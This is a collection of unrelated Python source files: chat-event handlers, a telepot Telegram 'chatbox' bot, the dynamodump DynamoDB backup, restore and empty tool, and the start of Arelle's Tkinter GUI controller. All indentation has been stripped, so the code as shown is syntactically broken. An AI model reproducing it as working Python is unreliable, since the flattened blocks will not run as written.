def on_chat_view_only_enabled(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_view_only_disabled(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_unpin_announcement(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_tipping_enabled(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_tipping_disabled(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_timestamp_message(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_welcome_message(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_invite_message(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_user_typing_start(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_user_typing_end(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def default(self, data): self.call(getframe(0).f_code.co_name, data)
|
chatbox_nodb.py
|
import sys
import telepot
from telepot.delegate import per_chat_id_in, call, create_open
"""
$ python3.2 chatbox_nodb.py <token> <owner_id>
Chatbox - a mailbox for chats
1. People send messages to your bot.
2. Your bot remembers the messages.
3. You read the messages later.
This version only stores the messages in memory. If the bot is killed, all messages are lost.
This version only handles text messages.
It accepts the following commands from you, the owner, only:
- /unread - tells you who has sent you messages and how many
- /next - read next sender's messages
It can be a starting point for customer-support type of bots.
"""
# Simulate a database to store unread messages
class UnreadStore(object):
def __init__(self):
self._db = {}
def put(self, msg):
chat_id = msg['chat']['id']
if chat_id not in self._db:
self._db[chat_id] = []
self._db[chat_id].append(msg)
# Pull all unread messages of a `chat_id`
def pull(self, chat_id):
messages = self._db[chat_id]
del self._db[chat_id]
# sort by date
messages.sort(key=lambda m: m['date'])
return messages
# Tells how many unread messages per chat_id
def unread_per_chat(self):
return [(k,len(v)) for k,v in self._db.items()]
# Accept commands from owner. Give him unread messages.
class OwnerHandler(telepot.helper.ChatHandler):
def __init__(self, seed_tuple, timeout, store):
super(OwnerHandler, self).__init__(seed_tuple, timeout)
self._store = store
def _read_messages(self, messages):
for msg in messages:
# assume all messages are text
self.sender.sendMessage(msg['text'])
def on_message(self, msg):
content_type, chat_type, chat_id = telepot.glance(msg)
if content_type != 'text':
self.sender.sendMessage("I don't understand")
return
command = msg['text'].strip().lower()
# Tells who has sent you how many messages
if command == '/unread':
results = self._store.unread_per_chat()
lines = []
for r in results:
n = 'ID: %d\n%d unread' % r
lines.append(n)
if not len(lines):
self.sender.sendMessage('No unread messages')
else:
self.sender.sendMessage('\n'.join(lines))
# read next sender's messages
elif command == '/next':
results = self._store.unread_per_chat()
if not len(results):
self.sender.sendMessage('No unread messages')
return
chat_id = results[0][0]
unread_messages = self._store.pull(chat_id)
self.sender.sendMessage('From ID: %d' % chat_id)
self._read_messages(unread_messages)
else:
self.sender.sendMessage("I don't understand")
class MessageSaver(telepot.helper.Monitor):
def __init__(self, seed_tuple, store, exclude):
# The `capture` criteria means to capture all messages.
super(MessageSaver, self).__init__(seed_tuple, capture=[{'_': lambda msg: True}])
self._store = store
self._exclude = exclude
# Store every message, except those whose sender is in the exclude list, or non-text messages.
def on_message(self, msg):
content_type, chat_type, chat_id = telepot.glance(msg)
if chat_id in self._exclude:
print('Chat id %d is excluded.' % chat_id)
return
if content_type != 'text':
print('Content type %s is ignored.' % content_type)
return
print('Storing message: %s' % msg)
self._store.put(msg)
import threading
class CustomThread(threading.Thread):
def start(self):
print('CustomThread starting ...')
super(CustomThread, self).start()
# Note how this function wraps around the `call()` function below to implement
# a custom thread for delegation.
def custom_thread(func):
def f(seed_tuple):
target = func(seed_tuple)
if type(target) is tuple:
run, args, kwargs = target
t = CustomThread(target=run, args=args, kwargs=kwargs)
else:
t = CustomThread(target=target)
return t
return f
class ChatBox(telepot.DelegatorBot):
def __init__(self, token, owner_id):
self._owner_id = owner_id
self._seen = set()
self._store = UnreadStore()
super(ChatBox, self).__init__(token, [
# Here is a delegate to specially handle owner commands.
(per_chat_id_in([owner_id]), create_open(OwnerHandler, 20, self._store)),
# Seed is always the same, meaning only one MessageSaver is ever spawned for entire application.
(lambda msg: 1, create_open(MessageSaver, self._store, exclude=[owner_id])),
# For senders never seen before, send him a welcome message.
(self._is_newcomer, custom_thread(call(self._send_welcome))),
])
# seed-calculating function: use returned value to indicate whether to spawn a delegate
def _is_newcomer(self, msg):
chat_id = msg['chat']['id']
if chat_id == self._owner_id: # Sender is owner
return None # No delegate spawned
if chat_id in self._seen: # Sender has been seen before
return None # No delegate spawned
self._seen.add(chat_id)
return [] # non-hashable ==> delegates are independent, no seed association is made.
def _send_welcome(self, seed_tuple):
chat_id = seed_tuple[1]['chat']['id']
print('Sending welcome ...')
self.sendMessage(chat_id, 'Hello!')
TOKEN = sys.argv[1]
OWNER_ID = int(sys.argv[2])
bot = ChatBox(TOKEN, OWNER_ID)
bot.notifyOnMessage(run_forever=True)
|
dynamodump.py
|
#!/usr/bin/env python
import argparse
import json
import logging
import os
import shutil
import threading
import boto.dynamodb2.layer1
import datetime
import errno
import sys
import time
import re
from boto.dynamodb2.layer1 import DynamoDBConnection
from botocore.exceptions import BotoCoreError
import boto3
JSON_INDENT = 2
AWS_SLEEP_INTERVAL = 10 # seconds
LOCAL_SLEEP_INTERVAL = 1 # seconds
BATCH_WRITE_SLEEP_INTERVAL = 0.15 # seconds
MAX_BATCH_WRITE = 25 # DynamoDB limit
SCHEMA_FILE = "schema.json"
DATA_DIR = "data"
MAX_RETRY = 6
LOCAL_REGION = "local"
LOG_LEVEL = "INFO"
DATA_DUMP = "dump"
RESTORE_WRITE_CAPACITY = 25
THREAD_START_DELAY = 1 # seconds
CURRENT_WORKING_DIR = os.getcwd()
DEFAULT_PREFIX_SEPARATOR = "-"
def get_table_name_matches(conn, table_name_wildcard, separator):
all_tables = []
last_evaluated_table_name = None
while True:
table_list = conn.list_tables(exclusive_start_table_name=last_evaluated_table_name)
all_tables.extend(table_list["TableNames"])
try:
last_evaluated_table_name = table_list["LastEvaluatedTableName"]
except KeyError:
break
matching_tables = []
for table_name in all_tables:
if table_name_wildcard == "*":
matching_tables.append(table_name)
elif separator is None:
if table_name.startswith(table_name_wildcard.split("*", 1)[0]):
matching_tables.append(table_name)
elif separator == '':
if table_name.startswith(re.sub(r"([A-Z])", r" \1", table_name_wildcard.split("*", 1)[0]).split()[0]):
matching_tables.append(table_name)
elif table_name.split(separator, 1)[0] == table_name_wildcard.split("*", 1)[0]:
matching_tables.append(table_name)
return matching_tables
def get_restore_table_matches(table_name_wildcard, separator):
matching_tables = []
try:
dir_list = os.listdir("./" + args.dumpPath)
except OSError:
logging.info("Cannot find \"./%s\", Now trying current working directory.." % args.dumpPath)
dump_data_path = CURRENT_WORKING_DIR
try:
dir_list = os.listdir(dump_data_path)
except OSError:
logging.info("Cannot find \"%s\" directory containing dump files!" % dump_data_path)
sys.exit(1)
for dir_name in dir_list:
if table_name_wildcard == "*":
matching_tables.append(dir_name)
elif separator == '':
if dir_name.startswith(re.sub(r"([A-Z])", r" \1", table_name_wildcard.split("*", 1)[0]).split()[0]):
matching_tables.append(dir_name)
elif dir_name.split(separator, 1)[0] == table_name_wildcard.split("*", 1)[0]:
matching_tables.append(dir_name)
return matching_tables
def change_prefix(source_table_name, source_wildcard, destination_wildcard, separator):
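# Illustrative mapping (assumed inputs): with separator "-", source wildcard
# "Prod*" and destination wildcard "Stage*", table "Prod-Users" becomes
# "Stage-Users"; with separator '' the prefix is the first CamelCase segment,
# split out by the regex below.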
source_prefix = source_wildcard.split("*", 1)[0]
destination_prefix = destination_wildcard.split("*", 1)[0]
if separator == '':
if re.sub(r"([A-Z])", r" \1", source_table_name).split()[0] == source_prefix:
return destination_prefix + re.sub(r"([A-Z])", r" \1", source_table_name).split(' ', 1)[1].replace(" ", "")
if source_table_name.split(separator, 1)[0] == source_prefix:
return destination_prefix + separator + source_table_name.split(separator, 1)[1]
def delete_table(conn, sleep_interval, table_name):
if not args.dataOnly:
while True:
# delete table if exists
table_exist = True
try:
conn.delete_table(table_name)
except boto.exception.JSONResponseError as e:
if e.body["__type"] == "com.amazonaws.dynamodb.v20120810#ResourceNotFoundException":
table_exist = False
logging.info(table_name + " table deleted!")
break
elif e.body["__type"] == "com.amazonaws.dynamodb.v20120810#LimitExceededException":
logging.info("Limit exceeded, retrying deletion of " + table_name + "..")
time.sleep(sleep_interval)
elif e.body["__type"] == "com.amazon.coral.availability#ThrottlingException":
logging.info("Control plane limit exceeded, retrying deletion of " + table_name + "..")
time.sleep(sleep_interval)
elif e.body["__type"] == "com.amazonaws.dynamodb.v20120810#ResourceInUseException":
logging.info(table_name + " table is being deleted..")
time.sleep(sleep_interval)
else:
logging.exception(e)
sys.exit(1)
# if table exists, wait till deleted
if table_exist:
try:
while True:
logging.info("Waiting for " + table_name + " table to be deleted.. [" +
conn.describe_table(table_name)["Table"]["TableStatus"] + "]")
time.sleep(sleep_interval)
except boto.exception.JSONResponseError as e:
if e.body["__type"] == "com.amazonaws.dynamodb.v20120810#ResourceNotFoundException":
logging.info(table_name + " table deleted.")
pass
else:
logging.exception(e)
sys.exit(1)
def mkdir_p(path):
try:
os.makedirs(path)
except OSError as exc:
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def batch_write(conn, sleep_interval, table_name, put_requests):
request_items = {table_name: put_requests}
i = 1
sleep = sleep_interval
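# Linear backoff: on each pass that leaves unprocessed items, the sleep grows
# by sleep_interval, giving up (but continuing the dump) after MAX_RETRY tries.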
while True:
response = conn.batch_write_item(request_items)
unprocessed_items = response["UnprocessedItems"]
if len(unprocessed_items) == 0:
break
if len(unprocessed_items) > 0 and i <= MAX_RETRY:
logging.debug(str(len(unprocessed_items)) + " unprocessed items, retrying after %s seconds.. [%s/%s]" % (str(sleep), str(i), str(MAX_RETRY)))
request_items = unprocessed_items
time.sleep(sleep)
sleep += sleep_interval
i += 1
else:
logging.info("Max retries reached, failed to processed batch write: " + json.dumps(unprocessed_items,
indent=JSON_INDENT))
logging.info("Ignoring and continuing..")
break
def wait_for_active_table(conn, table_name, verb):
while True:
if conn.describe_table(table_name)["Table"]["TableStatus"] != "ACTIVE":
logging.info("Waiting for " + table_name + " table to be " + verb + ".. [" +
conn.describe_table(table_name)["Table"]["TableStatus"] + "]")
time.sleep(sleep_interval)
else:
logging.info(table_name + " " + verb + ".")
break
def do_empty(conn, table_name):
logging.info("Starting Empty for " + table_name + "..")
# get table schema
logging.info("Fetching table schema for " + table_name)
table_data = conn.describe_table(table_name)
table_desc = table_data["Table"]
table_attribute_definitions = table_desc["AttributeDefinitions"]
table_key_schema = table_desc["KeySchema"]
original_read_capacity = table_desc["ProvisionedThroughput"]["ReadCapacityUnits"]
original_write_capacity = table_desc["ProvisionedThroughput"]["WriteCapacityUnits"]
table_local_secondary_indexes = table_desc.get("LocalSecondaryIndexes")
table_global_secondary_indexes = table_desc.get("GlobalSecondaryIndexes")
table_provisioned_throughput = {"ReadCapacityUnits": int(original_read_capacity),
"WriteCapacityUnits": int(original_write_capacity)}
logging.info("Deleting Table " + table_name)
delete_table(conn, sleep_interval, table_name)
logging.info("Creating Table " + table_name)
while True:
try:
conn.create_table(table_attribute_definitions, table_name, table_key_schema, table_provisioned_throughput,
table_local_secondary_indexes, table_global_secondary_indexes)
break
except boto.exception.JSONResponseError as e:
if e.body["__type"] == "com.amazonaws.dynamodb.v20120810#LimitExceededException":
logging.info("Limit exceeded, retrying creation of " + table_name + "..")
time.sleep(sleep_interval)
elif e.body["__type"] == "com.amazon.coral.availability#ThrottlingException":
logging.info("Control plane limit exceeded, retrying creation of " + table_name + "..")
time.sleep(sleep_interval)
else:
logging.exception(e)
sys.exit(1)
# wait for table creation completion
wait_for_active_table(conn, table_name, "created")
logging.info("Recreation of " + table_name + " completed. Time taken: " + str(
datetime.datetime.now().replace(microsecond=0) - start_time))
def do_backup(conn, table_name, read_capacity):
logging.info("Starting backup for " + table_name + "..")
# trash data, re-create subdir
if os.path.exists(args.dumpPath + "/" + table_name):
shutil.rmtree(args.dumpPath + "/" + table_name)
mkdir_p(args.dumpPath + "/" + table_name)
# get table schema
logging.info("Dumping table schema for " + table_name)
f = open(args.dumpPath + "/" + table_name + "/" + SCHEMA_FILE, "w+")
table_desc = conn.describe_table(table_name)
f.write(json.dumps(table_desc, indent=JSON_INDENT))
f.close()
if not args.schemaOnly:
original_read_capacity = table_desc["Table"]["ProvisionedThroughput"]["ReadCapacityUnits"]
original_write_capacity = table_desc["Table"]["ProvisionedThroughput"]["WriteCapacityUnits"]
# get table data
logging.info("Dumping table items for " + table_name)
mkdir_p(args.dumpPath + "/" + table_name + "/" + DATA_DIR)
i = 1
last_evaluated_key = None
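# Paginate the full table scan: DynamoDB returns LastEvaluatedKey until the
# scan is exhausted, and each page is written to a zero-padded JSON file.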
while True:
scanned_table = conn.scan(table_name, exclusive_start_key=last_evaluated_key)
f = open(args.dumpPath + "/" + table_name + "/" + DATA_DIR + "/" + str(i).zfill(4) + ".json", "w+")
f.write(json.dumps(scanned_table, indent=JSON_INDENT))
f.close()
i += 1
try:
last_evaluated_key = scanned_table["LastEvaluatedKey"]
except KeyError:
break
logging.info("Backup for " + table_name + " table completed. Time taken: " + str(
datetime.datetime.now().replace(microsecond=0) - start_time))
def do_restore(conn, sleep_interval, source_table, destination_table, write_capacity):
logging.info("Starting restore for " + source_table + " to " + destination_table + "..")
# create table using schema
# restore source_table from dump directory if it exists else try current working directory
if os.path.exists("%s/%s" % (args.dumpPath, source_table)):
dump_data_path = args.dumpPath
else:
logging.info("Cannot find \"./%s/%s\", Now trying current working directory.." % (args.dumpPath, source_table))
if os.path.exists("%s/%s" % (CURRENT_WORKING_DIR, source_table)):
dump_data_path = CURRENT_WORKING_DIR
else:
logging.info("Cannot find \"%s/%s\" directory containing dump files!" % (CURRENT_WORKING_DIR, source_table))
sys.exit(1)
table_data = json.load(open(dump_data_path + "/" + source_table + "/" + SCHEMA_FILE))
table = table_data["Table"]
table_attribute_definitions = table["AttributeDefinitions"]
table_table_name = destination_table
table_key_schema = table["KeySchema"]
original_read_capacity = table["ProvisionedThroughput"]["ReadCapacityUnits"]
original_write_capacity = table["ProvisionedThroughput"]["WriteCapacityUnits"]
table_local_secondary_indexes = table.get("LocalSecondaryIndexes")
table_global_secondary_indexes = table.get("GlobalSecondaryIndexes")
# override table write capacity if specified, else use RESTORE_WRITE_CAPACITY if original write capacity is lower
if write_capacity is None:
if original_write_capacity < RESTORE_WRITE_CAPACITY:
write_capacity = RESTORE_WRITE_CAPACITY
else:
write_capacity = original_write_capacity
# override GSI write capacities if specified, else use RESTORE_WRITE_CAPACITY if original write capacity is lower
original_gsi_write_capacities = []
if table_global_secondary_indexes is not None:
for gsi in table_global_secondary_indexes:
original_gsi_write_capacities.append(gsi["ProvisionedThroughput"]["WriteCapacityUnits"])
if gsi["ProvisionedThroughput"]["WriteCapacityUnits"] < int(write_capacity):
gsi["ProvisionedThroughput"]["WriteCapacityUnits"] = int(write_capacity)
# temp provisioned throughput for restore
table_provisioned_throughput = {"ReadCapacityUnits": int(original_read_capacity),
"WriteCapacityUnits": int(write_capacity)}
if not args.dataOnly:
logging.info("Creating " + destination_table + " table with temp write capacity of " + str(write_capacity))
while True:
try:
conn.create_table(table_attribute_definitions, table_table_name, table_key_schema,
table_provisioned_throughput, table_local_secondary_indexes,
table_global_secondary_indexes)
break
except boto.exception.JSONResponseError as e:
if e.body["__type"] == "com.amazonaws.dynamodb.v20120810#LimitExceededException":
logging.info("Limit exceeded, retrying creation of " + destination_table + "..")
time.sleep(sleep_interval)
elif e.body["__type"] == "com.amazon.coral.availability#ThrottlingException":
logging.info("Control plane limit exceeded, retrying creation of " + destination_table + "..")
time.sleep(sleep_interval)
else:
logging.exception(e)
sys.exit(1)
# wait for table creation completion
wait_for_active_table(conn, destination_table, "created")
if not args.schemaOnly:
# read data files
logging.info("Restoring data for " + destination_table + " table..")
data_file_list = os.listdir(dump_data_path + "/" + source_table + "/" + DATA_DIR + "/")
data_file_list.sort()
for data_file in data_file_list:
logging.info("Processing " + data_file + " of " + destination_table)
items = []
item_data = json.load(open(dump_data_path + "/" + source_table + "/" + DATA_DIR + "/" + data_file))
items.extend(item_data["Items"])
# batch write data
put_requests = []
while len(items) > 0:
put_requests.append({"PutRequest": {"Item": items.pop(0)}})
# flush every MAX_BATCH_WRITE
if len(put_requests) == MAX_BATCH_WRITE:
logging.debug("Writing next " + str(MAX_BATCH_WRITE) + " items to " + destination_table + "..")
batch_write(conn, BATCH_WRITE_SLEEP_INTERVAL, destination_table, put_requests)
del put_requests[:]
# flush remainder
if len(put_requests) > 0:
batch_write(conn, BATCH_WRITE_SLEEP_INTERVAL, destination_table, put_requests)
if not args.skipThroughputUpdate:
# loop through each GSI to check if it has changed and update if necessary
if table_global_secondary_indexes is not None:
gsi_data = []
for gsi in table_global_secondary_indexes:
original_gsi_write_capacity = original_gsi_write_capacities.pop(0)
if original_gsi_write_capacity != gsi["ProvisionedThroughput"]["WriteCapacityUnits"]:
gsi_data.append({"Update": {"IndexName": gsi["IndexName"],
"ProvisionedThroughput": {
"ReadCapacityUnits": int(
gsi["ProvisionedThroughput"]["ReadCapacityUnits"]),
"WriteCapacityUnits": int(original_gsi_write_capacity)}}})
logging.info("Updating " + destination_table + " global secondary indexes write capacities as necessary..")
while True:
try:
conn.update_table(destination_table, global_secondary_index_updates=gsi_data)
break
except boto.exception.JSONResponseError as e:
if e.body["__type"] == "com.amazonaws.dynamodb.v20120810#LimitExceededException":
logging.info(
"Limit exceeded, retrying updating throughput of GlobalSecondaryIndexes in " + destination_table + "..")
time.sleep(sleep_interval)
elif e.body["__type"] == "com.amazon.coral.availability#ThrottlingException":
    logging.info(
        "Control plane limit exceeded, retrying updating throughput of GlobalSecondaryIndexes in " + destination_table + "..")
    time.sleep(sleep_interval)
else:
    logging.exception(e)
    sys.exit(1)
# wait for table to become active
wait_for_active_table(conn, destination_table, "active")
logging.info("Restore for " + source_table + " to " + destination_table + " table completed. Time taken: " + str(
datetime.datetime.now().replace(microsecond=0) - start_time))
else:
logging.info("Empty schema of " + source_table + " table created. Time taken: " + str(datetime.datetime.now().replace(microsecond=0) - start_time))
def get_credentials(profile, region):
try:
session = boto3.Session(profile_name=profile, region_name=region)
except BotoCoreError:
return None
credentials = session.get_credentials()
return credentials
# parse args
parser = argparse.ArgumentParser(description="Simple DynamoDB backup/restore/empty.")
parser.add_argument("-m", "--mode", help="'backup' or 'restore' or 'empty'")
parser.add_argument("-r", "--region",
help="AWS region to use, e.g. 'us-west-1'. Use '" + LOCAL_REGION + "' for local DynamoDB testing")
parser.add_argument("--host", help="Host of local DynamoDB [required only for local]")
parser.add_argument("--port", help="Port of local DynamoDB [required only for local]")
parser.add_argument("--accessKey", help="Access key of local DynamoDB [required only for local]")
parser.add_argument("--secretKey", help="Secret key of local DynamoDB [required only for local]")
parser.add_argument("--sessionToken", help="Session token for AWS profile, aka security token [required for temporary AWS sessions unless profile specified]")
parser.add_argument("-p", "--profile",
help="AWS credentials file profile to use. Allows you to use a profile instead of accessKey, secretKey authentication")
parser.add_argument("-s", "--srcTable",
help="Source DynamoDB table name to backup or restore from, use 'tablename*' for wildcard prefix selection or '*' for all tables")
parser.add_argument("-d", "--destTable",
help="Destination DynamoDB table name to backup or restore to, use 'tablename*' for wildcard prefix selection (defaults to use '-' separator) [optional, defaults to source]")
parser.add_argument("--prefixSeparator", help="Specify a different prefix separator, e.g. '.' [optional]")
parser.add_argument("--noSeparator", action='store_true',
help="Overrides the use of a prefix separator for backup wildcard searches [optional]")
parser.add_argument("--readCapacity",
help="Change the temp read capacity of the DynamoDB table to backup from [optional]")
parser.add_argument("--writeCapacity",
help="Change the temp write capacity of the DynamoDB table to restore to [defaults to " + str(
RESTORE_WRITE_CAPACITY) + ", optional]")
parser.add_argument("--schemaOnly", action="store_true", default=False,
help="Backup or restore the schema only. Do not backup/restore data. Can be used with both backup and restore modes. Cannot be used with the --dataOnly [optional]")
parser.add_argument("--dataOnly", action="store_true", default=False,
help="Restore data only. Do not delete/recreate schema [optional for restore]")
parser.add_argument("--skipThroughputUpdate", action="store_true", default=False,
help="Skip updating throughput values across tables [optional]")
parser.add_argument("--dumpPath", help="Directory to place and search for DynamoDB table backups (defaults to use '" + str(DATA_DUMP) + "') [optional]", default=str(DATA_DUMP))
parser.add_argument("--log", help="Logging level - DEBUG|INFO|WARNING|ERROR|CRITICAL [optional]")
args = parser.parse_args()
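# Example invocations (illustrative; only flags defined above are used):
#   python dynamodump.py -m backup -r us-west-1 -s 'prod*'
#   python dynamodump.py -m restore -r local --host localhost --port 8000 --accessKey a --secretKey s -s mytable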
# set log level
log_level = LOG_LEVEL
if args.log is not None:
log_level = args.log.upper()
logging.basicConfig(level=getattr(logging, log_level))
# Check to make sure that --dataOnly and --schemaOnly weren't simultaneously specified
if args.schemaOnly and args.dataOnly:
logging.info("Options --schemaOnly and --dataOnly are mutually exclusive.")
sys.exit(1)
# instantiate connection
if args.region == LOCAL_REGION:
conn = DynamoDBConnection(aws_access_key_id=args.accessKey, aws_secret_access_key=args.secretKey, host=args.host,
port=int(args.port), is_secure=False)
sleep_interval = LOCAL_SLEEP_INTERVAL
else:
if not args.profile:
conn = boto.dynamodb2.connect_to_region(args.region, aws_access_key_id=args.accessKey,
aws_secret_access_key=args.secretKey,
security_token=args.sessionToken)
sleep_interval = AWS_SLEEP_INTERVAL
else:
credentials = get_credentials(profile=args.profile, region=args.region)
conn = boto.dynamodb2.connect_to_region(args.region, aws_access_key_id=credentials.access_key,
aws_secret_access_key=credentials.secret_key,
security_token=credentials.token)
sleep_interval = AWS_SLEEP_INTERVAL
# set prefix separator
prefix_separator = DEFAULT_PREFIX_SEPARATOR
if args.prefixSeparator is not None:
prefix_separator = args.prefixSeparator
if args.noSeparator:
prefix_separator = None
# do backup/restore
start_time = datetime.datetime.now().replace(microsecond=0)
if args.mode == "backup":
if args.srcTable.find("*") != -1:
matching_backup_tables = get_table_name_matches(conn, args.srcTable, prefix_separator)
logging.info("Found " + str(len(matching_backup_tables)) + " table(s) in DynamoDB host to backup: " + ", ".join(
matching_backup_tables))
threads = []
for table_name in matching_backup_tables:
t = threading.Thread(target=do_backup, args=(conn, table_name, args.readCapacity,))
threads.append(t)
t.start()
time.sleep(THREAD_START_DELAY)
for thread in threads:
thread.join()
logging.info("Backup of table(s) " + args.srcTable + " completed!")
else:
do_backup(conn, args.srcTable, args.readCapacity)
elif args.mode == "restore":
if args.destTable is not None:
dest_table = args.destTable
else:
dest_table = args.srcTable
if dest_table.find("*") != -1:
matching_destination_tables = get_table_name_matches(conn, dest_table, prefix_separator)
delete_str = ": " if args.dataOnly else " to be deleted: "
logging.info(
"Found " + str(len(matching_destination_tables)) + " table(s) in DynamoDB host" + delete_str + ", ".join(
matching_destination_tables))
threads = []
for table_name in matching_destination_tables:
t = threading.Thread(target=delete_table, args=(conn, sleep_interval, table_name,))
threads.append(t)
t.start()
time.sleep(THREAD_START_DELAY)
for thread in threads:
thread.join()
matching_restore_tables = get_restore_table_matches(args.srcTable, prefix_separator)
logging.info(
"Found " + str(len(matching_restore_tables)) + " table(s) in " + args.dumpPath + " to restore: " + ", ".join(
matching_restore_tables))
threads = []
for source_table in matching_restore_tables:
if args.srcTable == "*":
t = threading.Thread(target=do_restore,
args=(conn, sleep_interval, source_table, source_table, args.writeCapacity))
else:
t = threading.Thread(target=do_restore, args=(conn, sleep_interval, source_table,
change_prefix(source_table, args.srcTable, dest_table,
prefix_separator), args.writeCapacity,))
threads.append(t)
t.start()
time.sleep(THREAD_START_DELAY)
for thread in threads:
thread.join()
logging.info("Restore of table(s) " + args.srcTable + " to " + dest_table + " completed!")
else:
delete_table(conn, sleep_interval, dest_table)
do_restore(conn, sleep_interval, args.srcTable, dest_table, args.writeCapacity)
elif args.mode == "empty":
if args.srcTable.find("*") != -1:
matching_backup_tables = get_table_name_matches(conn, args.srcTable, prefix_separator)
logging.info("Found " + str(len(matching_backup_tables)) + " table(s) in DynamoDB host to empty: " + ", ".join(
matching_backup_tables))
threads = []
for table_name in matching_backup_tables:
t = threading.Thread(target=do_empty, args=(conn, table_name))
threads.append(t)
t.start()
time.sleep(THREAD_START_DELAY)
for thread in threads:
thread.join()
logging.info("Empty of table(s) " + args.srcTable + " completed!")
else:
do_empty(conn, args.srcTable)
|
CntlrWinMain.py
|
'''
Created on Oct 3, 2010
This module is Arelle's controller in windowing interactive UI mode
@author: Mark V Systems Limited
(c) Copyright 2010 Mark V Systems Limited, All rights reserved.
'''
from arelle import PythonUtil # define 2.x or 3.x string types
import os, sys, subprocess, pickle, time, locale, re, fnmatch
if sys.platform == 'win32' and getattr(sys, 'frozen', False):
# need the .dll directory in the path to be able to access Tk and Tcl DLLs before importing Tk, etc.
os.environ['PATH'] = os.path.dirname(sys.executable) + ";" + os.environ['PATH']
from tkinter import (Tk, Tcl, TclError, Toplevel, Menu, PhotoImage, StringVar, BooleanVar, N, S, E, W, EW,
HORIZONTAL, VERTICAL, END, font as tkFont)
try:
from tkinter.ttk import Frame, Button, Label, Combobox, Separator, PanedWindow, Notebook
except ImportError: # 3.0 versions of tkinter
from ttk import Frame, Button, Label, Combobox, Separator, PanedWindow, Notebook
try:
import syslog
except ImportError:
syslog = None
import tkinter.tix
import tkinter.filedialog
import tkinter.messagebox, traceback
from arelle.FileSource import saveFile as writeToFile
from arelle.Locale import format_string
from arelle.CntlrWinTooltip import ToolTip
from arelle import XbrlConst
from arelle.PluginManager import pluginClassMethods
from arelle.UrlUtil import isHttpUrl
import logging
import threading, queue
from arelle import Cntlr
from arelle import (DialogURL, DialogLanguage,
DialogPluginManager, DialogPackageManager,
ModelDocument,
ModelManager,
PackageManager,
RenderingEvaluator,
TableStructure,
ViewWinDTS,
ViewWinProperties, ViewWinConcepts, ViewWinRelationshipSet, ViewWinFormulae,
ViewWinFactList, ViewFileFactList, ViewWinFactTable, ViewWinRenderedGrid, ViewWinXml,
ViewWinRoleTypes, ViewFileRoleTypes, ViewFileConcepts,
ViewWinTests, ViewWinTree, ViewWinVersReport, ViewWinRssFeed,
ViewFileTests,
ViewFileRenderedGrid,
ViewFileRelationshipSet,
Updater
)
from arelle.ModelFormulaObject import FormulaOptions
from arelle.FileSource import openFileSource
restartMain = True
class CntlrWinMain (Cntlr.Cntlr):
def __init__(self, parent):
super(CntlrWinMain, self).__init__(hasGui=True)
self.parent = parent
self.filename = None
self.dirty = False
overrideLang = self.config.get("labelLangOverride")
self.labelLang = overrideLang if overrideLang else self.modelManager.defaultLang
self.data = {}
if self.isMac: # mac Python fonts are bigger than in other apps (Terminal, TextEdit, Word) and than in Windows Arelle
_defaultFont = tkFont.nametofont("TkDefaultFont") # label, status bar, treegrid
_defaultFont.configure(size=11)
_textFont = tkFont.nametofont("TkTextFont") # entry widget and combobox entry field
_textFont.configure(size=11)
#parent.option_add("*Font", _defaultFont) # would be needed if not using defaulted font
toolbarButtonPadding = 1
else:
toolbarButtonPadding = 4
tkinter.CallWrapper = TkinterCallWrapper
imgpath = self.imagesDir + os.sep
if self.isMSW:
icon = imgpath + "arelle.ico"
parent.iconbitmap(icon, default=icon)
#image = PhotoImage(file=path + "arelle32.gif")
#label = Label(None, image=image)
#parent.iconwindow(label)
else:
self.iconImage = PhotoImage(file=imgpath + "arelle.gif") # must keep reference during life of window
parent.tk.call('wm', 'iconphoto', parent._w, self.iconImage)
#parent.iconbitmap("@" + imgpath + "arelle.xbm")
# try with gif file
#parent.iconbitmap(path + "arelle.gif")
self.menubar = Menu(self.parent)
self.parent["menu"] = self.menubar
self.fileMenu = Menu(self.menubar, tearoff=0)
self.fileMenuLength = 1
for label, command, shortcut_text, shortcut in (
#(_("New..."), self.fileNew, "Ctrl+N", "<Control-n>"),
(_("Open File..."), self.fileOpen, "Ctrl+O", "<Control-o>"),
(_("Open Web..."), self.webOpen, "Shift+Alt+O", "<Shift-Alt-o>"),
(_("Import File..."), self.importFileOpen, None, None),
(_("Import Web..."), self.importWebOpen, None, None),
(_("Reopen"), self.fileReopen, None, None),
("PLUG-IN", "CntlrWinMain.Menu.File.Open", None, None),
(_("Save"), self.fileSaveExistingFile, "Ctrl+S", "<Control-s>"),
(_("Save As..."), self.fileSave, None, None),
(_("Save DTS Package"), self.saveDTSpackage, None, None),
("PLUG-IN", "CntlrWinMain.Menu.File.Save", None, None),
(_("Close"), self.fileClose, "Ctrl+W", "<Control-w>"),
(None, None, None, None),
(_("Quit"), self.quit, "Ctrl+Q", "<Control-q>"),
#(_("Restart"), self.restart, None, None),
(None, None, None, None),
("",None,None,None) # position for file history
):
if label is None:
self.fileMenu.add_separator()
elif label == "PLUG-IN":
for pluginMenuExtender in pluginClassMethods(command):
pluginMenuExtender(self, self.fileMenu)
self.fileMenuLength += 1
else:
self.fileMenu.add_command(label=label, underline=0, command=command, accelerator=shortcut_text)
self.parent.bind(shortcut, command)
self.fileMenuLength += 1
self.loadFileMenuHistory()
self.menubar.add_cascade(label=_("File"), menu=self.fileMenu, underline=0)
toolsMenu = Menu(self.menubar, tearoff=0)
validateMenu = Menu(self.menubar, tearoff=0)
toolsMenu.add_cascade(label=_("Validation"), menu=validateMenu, underline=0)
validateMenu.add_command(label=_("Validate"), underline=0, command=self.validate)
self.modelManager.validateDisclosureSystem = self.config.setdefault("validateDisclosureSystem",False)
self.validateDisclosureSystem = BooleanVar(value=self.modelManager.validateDisclosureSystem)
self.validateDisclosureSystem.trace("w", self.setValidateDisclosureSystem)
